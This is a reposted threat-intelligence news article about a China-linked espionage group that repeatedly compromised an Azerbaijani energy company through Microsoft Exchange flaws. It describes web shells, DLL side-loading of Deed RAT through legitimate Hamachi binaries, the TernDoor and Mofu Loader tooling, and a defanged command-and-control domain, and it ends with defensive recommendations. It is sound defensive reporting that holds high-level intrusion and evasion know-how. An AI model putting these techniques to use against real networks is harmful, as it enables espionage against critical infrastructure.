top of page
Buscar

Azerbaijani Energy Firm Hit by Repeated Microsoft Exchange Exploitation

  • Foto del escritor: Javier Conejo del Cerro
    Javier Conejo del Cerro
  • 14 may
  • 5 min de lectura

Critical infrastructure operators have long been attractive targets for cyber-espionage groups, but the repeated compromise of an Azerbaijani oil and gas company between late 2025 and early 2026 demonstrates how persistence itself has become one of the most dangerous weapons in modern cyber operations. According to Bitdefender, a China-linked threat actor associated with FamousSparrow repeatedly exploited the same Microsoft Exchange entry point across multiple attack waves, continuously regaining access even after remediation attempts.

The campaign stands out not only because of the malware deployed, including Deed RAT and TernDoor, but because of the operational discipline displayed throughout the intrusion. The attackers repeatedly returned to the same environment, adapted their tooling, established new footholds, and evolved their techniques to maintain long-term espionage access within a strategically important energy organization tied to European energy security.

Rather than operating as a single breach event, the intrusion unfolded as a sustained campaign designed to survive cleanup efforts, bypass defensive responses, and ensure continuous visibility into the victim environment.


Phase 1: Opening the Exchange Door 


The intrusion began through the exploitation of Microsoft Exchange vulnerabilities associated with the ProxyNotShell attack chain. This provided the attackers with their initial foothold inside the organization’s infrastructure around late December 2025.

What makes the operation particularly significant is that the same vulnerable entry point continued to be abused repeatedly across multiple months. Even after remediation attempts, the attackers managed to return through the same Exchange pathway, highlighting how incomplete patching, unrotated credentials, or lingering persistence mechanisms can leave organizations exposed long after an initial compromise appears resolved.

The victim organization operated within Azerbaijan’s strategically important oil and gas sector, a region whose geopolitical relevance increased substantially following disruptions to Russian gas transit agreements and instability affecting global energy routes.

This elevated the intrusion beyond a simple corporate compromise and positioned it within the broader context of infrastructure-focused cyber-espionage operations.


Phase 2: Establishing Persistence Through Web Shells 


Once access was obtained, the attackers attempted to deploy web shells inside the Exchange environment to secure persistent access. These web shells acted as hidden control points that allowed the operators to return to the compromised servers even if portions of the malware infrastructure were removed.

Persistence quickly became one of the defining characteristics of the campaign.

Rather than relying on a single malware implant, the attackers layered multiple footholds across the environment. This redundancy ensured that losing one access mechanism would not necessarily terminate the operation.

The campaign also involved lateral movement across the network, allowing the operators to broaden visibility into the environment and establish additional control points throughout the infrastructure.

This approach reflects the operational maturity commonly associated with advanced espionage groups, where resilience and long-term access take priority over rapid destructive activity.


Phase 3: Deed RAT Enters the Environment 


During the first wave of activity, the attackers deployed Deed RAT, also known as Snappybee, a malware family considered a successor to ShadowPad and previously linked to several China-aligned espionage operations.

The malware was delivered through an evolved DLL side-loading technique that abused legitimate LogMeIn Hamachi binaries. Instead of using simplistic DLL replacement methods, the attackers modified specific exported functions inside the malicious DLL, effectively embedding the malware execution chain into the normal application workflow.

This created a staged execution process that made detection significantly harder because the malware appeared to operate as part of legitimate software behavior.

The technique also demonstrates how DLL side-loading continues evolving beyond traditional implementations. By integrating execution triggers directly into the host application’s natural control flow, the attackers reduced behavioral anomalies while improving defense evasion.

Once deployed, Deed RAT provided the operators with remote access capabilities and enabled further expansion throughout the compromised environment.


Phase 4: The Return of TernDoor 


Nearly a month after the first intrusion wave, the attackers returned.

This second phase involved an attempt to deploy TernDoor, another sophisticated backdoor previously observed targeting telecommunications infrastructure in South America. The malware delivery process leveraged Mofu Loader, a shellcode loader associated with threat activity linked to GroundPeony.

Although this particular deployment attempt was reportedly unsuccessful, the operation revealed a critical aspect of the campaign: the attackers were actively adapting their tooling and experimenting with different malware families to maintain operational continuity.

Rather than abandoning the target after partial disruption, the operators continuously evolved their intrusion methods.

This persistence transformed the campaign into a prolonged contest between remediation efforts and repeated reinfiltration attempts.


Phase 5: The Third Wave Arrives 


By late February 2026, the threat actors returned once again.

This time, they attempted to deploy a modified version of Deed RAT using updated infrastructure, including the command-and-control domain “sentinelonepro[.]com.” The reuse of the original malware family alongside modified variants suggests active refinement of the malware arsenal during ongoing operations.

The repeated intrusions across three separate waves demonstrate a highly disciplined operational model focused on resilience, adaptability, and long-term espionage positioning.

The attackers did not simply breach the network once and disappear. They repeatedly revisited the environment, rebuilt persistence, introduced new payloads, and tested alternative access paths.

This sustained approach is increasingly characteristic of modern state-aligned cyber operations targeting critical infrastructure sectors.


Phase 6: Energy Infrastructure Under Persistent Surveillance 


The geopolitical context surrounding the attack adds another important dimension to the campaign.

Azerbaijan’s growing role in European energy security following disruptions to Russian gas transit agreements and instability affecting Middle Eastern shipping routes has elevated the strategic value of regional energy infrastructure.

This makes oil and gas operators attractive intelligence targets for threat actors seeking geopolitical visibility, strategic leverage, or infrastructure access opportunities.

The intrusion also illustrates how cyber-espionage campaigns increasingly prioritize persistence over speed. Instead of conducting noisy destructive attacks, operators quietly maintain access over extended periods, enabling long-term monitoring, intelligence collection, and operational flexibility.

In many cases, the greatest danger is not the initial compromise itself, but the attacker’s ability to remain embedded inside the environment despite remediation attempts.


Measures to Fend Off Persistent Exchange Intrusions 


  • Patch Microsoft Exchange vulnerabilities immediately and validate remediation effectiveness.

  • Rotate all potentially compromised credentials after an intrusion.

  • Audit Exchange servers for unauthorized web shells and persistence mechanisms.

  • Monitor DLL side-loading activity involving legitimate binaries.

  • Segment critical infrastructure networks to reduce lateral movement opportunities.

  • Deploy continuous threat hunting rather than relying solely on reactive remediation.

  • Monitor outbound communications to suspicious command-and-control infrastructure.

  • Harden privileged access controls across operational environments.

  • Conduct post-remediation forensic reviews to identify hidden footholds.

  • Implement behavioral detection capable of identifying abnormal application workflows.

  • Continuously validate that previously exploited entry points cannot be reused.


Conclusion


The repeated compromise of the Azerbaijani energy company demonstrates how modern cyber-espionage campaigns increasingly behave less like isolated breaches and more like sustained military-style operations.


The attackers repeatedly exploited the same Exchange entry point, rebuilt persistence after remediation, rotated malware families, and evolved their tooling over time. Their objective was not simply to gain temporary access, but to maintain strategic presence inside a critical infrastructure environment for as long as possible.


Campaigns like this highlight a difficult reality for defenders: remediation is no longer just about removing malware. Organizations must fully eliminate persistence, rotate credentials, validate patching, monitor for reinfiltration, and assume attackers may attempt to return repeatedly.

Because in modern infrastructure espionage, the breach is often only the beginning.



The Hacker News


 
 
 

Comentarios

bottom of page